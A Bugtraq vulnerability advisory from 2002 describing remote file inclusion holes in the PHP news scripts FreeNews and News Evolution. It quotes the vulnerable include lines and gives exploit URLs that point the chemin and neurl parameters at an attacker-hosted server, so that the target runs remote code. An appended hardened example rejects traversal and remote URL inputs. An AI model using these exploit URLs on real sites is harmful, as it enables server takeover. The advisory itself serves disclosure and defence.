Bugtraq mailing list archives

FreeNews & News Evolution (PHP)


From: "Frog Man" <leseulfrog () hotmail com>
Date: Tue, 26 Nov 2002 17:43:49 +0100


Information :
°°°°°°°°°°°°°°
Problem : Include files
a) -------------------
Product : Freenews
Version : 2.1
Website : http://www.prologin.fr
----------------------

b) -------------------
Product : News Evolution
Versions : 1.0, 2.0
Website : http://www.phpevolution.net
----------------------


PHP Code/Location :
°°°°°°°°°°°°°°°°°°°
a) freenews 2.1
aff_news.php :
-------------------------------------------------
include ("$chemin/config.php");
include ("$chemin/options.inc.php");
include ("$chemin/freenews_functions.inc.php");
-------------------------------------------------

...

b) News Evolution 1.0
aff_news.php :
-------------------------------------
include ("$chemin/config.php");
include ("$chemin/functions.inc.php");
include ("$chemin/options.inc.php");
-------------------------------------

moteur/moteur.php :
--------------------------------------------------
include ("$chemin/moteur/moteur_form.php");
include ("$chemin/moteur/moteur_tab_results.php");
--------------------------------------------------

export_news.php :
---------------------------------------
include ("$chemin/config.php");
include ("$chemin/functions.inc.php");
include ("$chemin/options.inc.php");
include("$chemin/exporthtm.inc.php");
---------------------------------------

...

c) News Evolution 2.0
backend.php :
---------------------------------------------------------
include_once("$neurl/admin/modules/rss/easyRSS.inc.php");
---------------------------------------------------------

screen.php :
---------------------------------------------------------
include_once("$neurl/admin/cfg/configsql.inc.php");
include_once("$neurl/admin/cfg/configscreen.inc.php");
include_once("$neurl/admin/cfg/configsite.inc.php");
include_once("$neurl/admin/cfg/configtache.inc.php");
include_once("$neurl/admin/$sitelang");
include_once("$neurl/admin/fonctions/fctscr.php");
include_once("$neurl/admin/fonctions/fctadmin.php");
include_once("$neurl/admin/fonctions/fctform.php");
include_once("$neurl/admin/modules/cache.php");
---------------------------------------------------------

admin/modules/comment.php :
---------------------------------------------------------
@include_once("$neurl/admin/cfg/configscreen.inc.php");
@include_once("$neurl/admin/cfg/configsite.inc.php");
@include_once("$neurl/admin/$sitelang");
---------------------------------------------------------

...


Exploits :
°°°°°°°°°°
a) freenews 2.1
http://[target]/aff_news.php?chemin=http://[attacker]
with
http://[attacker]/config.php
http://[attacker]/options.inc.php
http://[attacker]/freenews_functions.inc.php
...

b) News Evolution 1.0
http://[target]/aff_news.php?chemin=http://[attacker]/
with
http://[attacker]/config.php
http://[attacker]/functions.inc.php
http://[attacker]/options.inc.php
...

c) News Evolution 2.0
http://[target]/screen.php?neurl=http://[attacker]
with :
http://[attacker]/admin/cfg/configsql.inc.php
http://[attacker]/admin/cfg/configscreen.inc.php
http://[attacker]/admin/cfg/configsite.inc.php
http://[attacker]/admin/cfg/configtache.inc.php
http://[attacker]/admin/fonctions/fctscr.php
http://[attacker]/admin/fonctions/fctadmin.php
http://[attacker]/admin/fonctions/fctform.php
http://[attacker]/admin/modules/cache.php


...

Patch :
°°°°°°°
http://www.phpsecure.org

More details :
°°°°°°°°°°°°°°
In French :
http://www.frog-man.org/tutos/NEfree.txt
Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FNEfree.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools

frog-m@n
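
A hardened form of the include pattern quoted in the message, as an added example that is not part of the original post and is not the patch it links to: the base directory is taken from the script's own location instead of `$chemin` or `$neurl`, and `$sitelang` is checked against an allow-list. `NEWS_ROOT`, `news_include_path()`, `news_lang_file()` and the language file names are hypothetical.

```php
<?php
// Added example, not vendor code. NEWS_ROOT, news_include_path(),
// news_lang_file() and the language file names are hypothetical.

// The base directory comes from this file's own location and is held in a
// constant, so request parameters named chemin or neurl cannot replace it.
define('NEWS_ROOT', realpath(__DIR__));

/**
 * Return the absolute path of $relative inside $root, or false when the
 * target is not an existing local file or resolves outside $root.
 */
function news_include_path($root, $relative)
{
    // realpath() resolves local files only; a URL or a missing file gives false.
    $full = realpath($root . DIRECTORY_SEPARATOR . $relative);
    if ($full === false) {
        return false;
    }
    $prefix = rtrim($root, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    return strncmp($full, $prefix, strlen($prefix)) === 0 ? $full : false;
}

/**
 * $sitelang is also part of an include path in screen.php and comment.php,
 * so only names from a fixed list are accepted; anything else falls back
 * to the first entry.
 */
function news_lang_file($requested, array $allowed)
{
    return in_array($requested, $allowed, true) ? $requested : $allowed[0];
}

// Constructed inputs: this file itself stands in for config.php.
$samples = [
    basename(__FILE__),                    // inside NEWS_ROOT
    '../../../../etc/passwd',              // escapes NEWS_ROOT
    'http://attacker.example/config.php',  // not a local file
];
foreach ($samples as $name) {
    $path = news_include_path(NEWS_ROOT, $name);
    echo $name, ' => ', ($path === false ? 'rejected' : $path), "\n";
}

$langs = ['lang_fr.inc.php', 'lang_en.inc.php'];  // placeholder names
echo news_lang_file('http://attacker.example/x', $langs), "\n";
echo news_lang_file('lang_en.inc.php', $langs), "\n";
```

In a script such as `aff_news.php`, each quoted `include ("$chemin/...")` line would call `news_include_path(NEWS_ROOT, ...)` and include the result only when it is not `false`.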

